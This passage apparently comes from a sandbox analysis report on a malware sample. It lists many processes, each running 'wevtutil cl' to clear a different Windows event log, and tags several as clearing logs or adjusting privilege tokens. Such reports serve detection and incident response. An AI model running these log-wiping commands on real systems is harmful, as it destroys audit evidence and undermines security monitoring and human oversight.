WEVTUTIL CL "DirectShowFilterGraph"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "DirectShowPluginControl"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Els_Hyphenation/Analytic"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "EndpointMapper"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "FirstUXPerf-Analytic"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "ForwardedEvents"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "General Logging"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "HardwareEvents"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "IHM_DebugChannel"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-I2C/Performance"
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Internet Explorer"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Key Management Service"
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MF_MediaFoundationDeviceMFT"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MF_MediaFoundationFrameServer"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MedaFoundationVideoProc"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MedaFoundationVideoProcD3D"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationAsyncWrapper"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationContentProtection"
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationDS"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationDeviceProxy"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationMP4"
2⤵
PID:4928

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationMediaEngine"
2⤵
PID:3636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationPerformance"
2⤵
PID:432

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationPerformanceCore"
2⤵
PID:2764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationPipeline"
2⤵
PID:2920

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationPlatform"
2⤵
PID:4072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "MediaFoundationSrcPrefetch"
2⤵
PID:276

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-AppV-Client-Streamingux/Debug"
2⤵
PID:1616

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-AppV-Client/Admin"
2⤵
PID:2636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-AppV-Client/Debug"
2⤵
PID:3156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-AppV-Client/Operational"
2⤵
PID:3760

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-AppV-Client/Virtual Applications"
2⤵
PID:3284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-AppV-SharedPerformance/Analytic"
2⤵
PID:864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Admin"
2⤵
PID:512

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Debug"
2⤵
PID:3460

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Diagnostic"
2⤵
PID:5064

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-IE/Diagnostic"
2⤵
- Clears Windows event logs
PID:1400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
2⤵
PID:1956

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
2⤵
PID:1564

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-OneCore-Setup/Analytic"
2⤵
PID:2324

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
2⤵
- Clears Windows event logs
PID:712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
2⤵
PID:1248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-Admin/Debug"
2⤵
PID:1568

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Debug"
2⤵
- Clears Windows event logs
PID:4728

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Operational"
2⤵
PID:4264

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Analytic"
2⤵
PID:2212

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Debug"
2⤵
PID:1816

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Operational"
2⤵
- Clears Windows event logs
PID:4640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-IPC/Operational"
2⤵
PID:4416

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
2⤵
PID:548

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
2⤵
PID:3724

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
2⤵
PID:4728

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AAD/Analytic"
2⤵
PID:2560

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AAD/Operational"
2⤵
PID:3876

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
2⤵
PID:4444

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ASN1/Operational"
2⤵
PID:3896

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
2⤵
PID:2164

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
2⤵
PID:1672

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
2⤵
PID:4064

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-All-User-Install-Agent/Admin"
2⤵
PID:4524

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AllJoyn/Debug"
2⤵
PID:4640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AllJoyn/Operational"
2⤵
PID:832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppHost/Admin"
2⤵
PID:612

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppHost/ApplicationTracing"
2⤵
PID:860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppHost/Diagnostic"
2⤵
PID:404

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppHost/Internal"
2⤵
PID:4908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
2⤵
PID:3328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
2⤵
- Clears Windows event logs
PID:1564

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
2⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Deployment"
2⤵
PID:4028

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Execution"
2⤵
PID:2924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Admin"
2⤵
PID:2704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Analytic"
2⤵
PID:2636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Debug"
2⤵
PID:836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Diagnostics"
2⤵
- Clears Windows event logs
PID:3924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppModel-State/Debug"
2⤵
PID:464

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppModel-State/Diagnostic"
2⤵
PID:2044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppReadiness/Admin"
2⤵
PID:3224

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppReadiness/Debug"
2⤵
PID:2992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppReadiness/Operational"
2⤵
PID:1260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppSruProv"
2⤵
PID:376

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppXDeployment/Diagnostic"
2⤵
PID:1508

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppXDeployment/Operational"
2⤵
PID:2980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Debug"
2⤵
PID:1020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
2⤵
PID:2636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Operational"
2⤵
PID:1816

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Restricted"
2⤵
PID:1400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Analytic"
2⤵
PID:1156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Operational"
2⤵
PID:740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
2⤵
PID:4640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
2⤵
PID:4940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
2⤵
PID:4536

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
2⤵
PID:4832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
2⤵
PID:4572

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
2⤵
PID:4648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
2⤵
PID:3652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
2⤵
PID:4384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
2⤵
PID:2172

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
2⤵
PID:3676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
2⤵
PID:1380

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Application-Experience/Steps-Recorder"
2⤵
PID:4360

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Debug"
2⤵
PID:3140

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Operational"
2⤵
PID:2656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Performance"
2⤵
PID:5048

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AssignedAccess/Admin"
2⤵
PID:4532

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AssignedAccess/Operational"
2⤵
PID:3324

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Admin"
2⤵
PID:3372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Operational"
2⤵
PID:3424

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AsynchronousCausality/Causality"
2⤵
PID:3772

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
2⤵
PID:3076

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/GlitchDetection"
2⤵
PID:276

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/Informational"
2⤵
PID:2016

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
2⤵
PID:4944

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
2⤵
PID:3244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audio/PlaybackManager"
2⤵
PID:1960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
2⤵
PID:1508

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
2⤵
PID:4024

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
2⤵
PID:4832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUser-Client"
2⤵
PID:4068

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
2⤵
PID:2836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
2⤵
PID:4948

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
2⤵
PID:3372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/HCI"
2⤵
PID:3248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/L2CAP"
2⤵
PID:3328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
2⤵
PID:1152

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Performance"
2⤵
PID:288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
2⤵
PID:1380

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
2⤵
PID:1828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
2⤵
PID:2756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Backup"
2⤵
PID:4776

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
2⤵
PID:864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
2⤵
PID:1796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Battery/Diagnostic"
2⤵
PID:3680

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Biometrics/Analytic"
2⤵
PID:4624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
2⤵
PID:4756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
2⤵
PID:5044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
2⤵
PID:1340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
2⤵
PID:4160

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Management"
2⤵
PID:432

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Operational"
2⤵
PID:2076

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BitLocker/Tracing"
2⤵
PID:5088

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
2⤵
PID:4044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
2⤵
- Clears Windows event logs
PID:3388

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
2⤵
PID:2596

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bluetooth-Bthmini/Operational"
2⤵
PID:3184

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
2⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Bluetooth-Policy/Operational"
2⤵
PID:908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
2⤵
PID:448

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
2⤵
PID:1520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
2⤵
PID:4640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheMonitoring/Analytic"
2⤵
PID:548

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
2⤵
PID:208

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
2⤵
PID:2720

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CAPI2/Catalog Database Debug"
2⤵
PID:4116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
2⤵
PID:1172

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
2⤵
PID:1320

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
2⤵
PID:3684

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/ApartmentInitialize"
2⤵
PID:4384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/ApartmentUninitialize"
2⤵
PID:4372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/Call"
2⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/CreateInstance"
2⤵
PID:4964

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/ExtensionCatalog"
2⤵
PID:3468

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/FreeUnusedLibrary"
2⤵
PID:3692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COM/RundownInstrumentation"
2⤵
PID:4148

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COMRuntime/Activations"
2⤵
PID:2188

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COMRuntime/MessageProcessing"
2⤵
PID:3812

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
2⤵
PID:3724

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
2⤵
PID:4696

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
2⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
2⤵
PID:1780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
2⤵
PID:5000

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Cleanmgr/Diagnostic"
2⤵
PID:2248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
2⤵
PID:5068

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CloudStore/Debug"
2⤵
PID:1868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CloudStore/Operational"
2⤵
PID:268

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
2⤵
PID:3812

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
2⤵
PID:4536

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
2⤵
PID:864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
2⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
2⤵
PID:4508

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Analytic"
2⤵
PID:116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Operational"
2⤵
PID:4848

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Debug"
2⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Operational"
2⤵
PID:2088

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Debug"
2⤵
PID:4936

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Operational"
2⤵
PID:4248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Debug"
2⤵
PID:4524

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Operational"
2⤵
PID:276

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CoreApplication/Diagnostic"
2⤵
PID:552

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CoreApplication/Operational"
2⤵
PID:3260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CoreApplication/Tracing"
2⤵
PID:4212

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
2⤵
- Clears Windows event logs
PID:4844

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
2⤵
PID:1148

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CoreWindow/Analytic"
2⤵
PID:5000

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CoreWindow/Debug"
2⤵
PID:4928

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
2⤵
PID:1956

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
2⤵
- Clears Windows event logs
PID:4416

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crashdump/Operational"
2⤵
PID:4428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
2⤵
PID:2056

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-BCRYPT/Analytic"
2⤵
PID:2308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-CNG/Analytic"
2⤵
PID:3284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
2⤵
PID:3688

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Debug"
2⤵
PID:2760

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Operational"
2⤵
PID:428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-DSSEnh/Analytic"
2⤵
PID:2824

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-NCrypt/Operational"
2⤵
PID:3652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
2⤵
PID:3888

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Crypto-RSAEnh/Analytic"
2⤵
PID:2088

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
2⤵
PID:2276

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
2⤵
PID:5036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DAL-Provider/Analytic"
2⤵
PID:2440

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DAL-Provider/Operational"
2⤵
PID:1904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DAMM/Diagnostic"
2⤵
PID:2216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
2⤵
PID:448

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DDisplay/Analytic"
2⤵
PID:3748

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DDisplay/Logging"
2⤵
PID:1704

C:\Windows\system32\wevtutil.exe
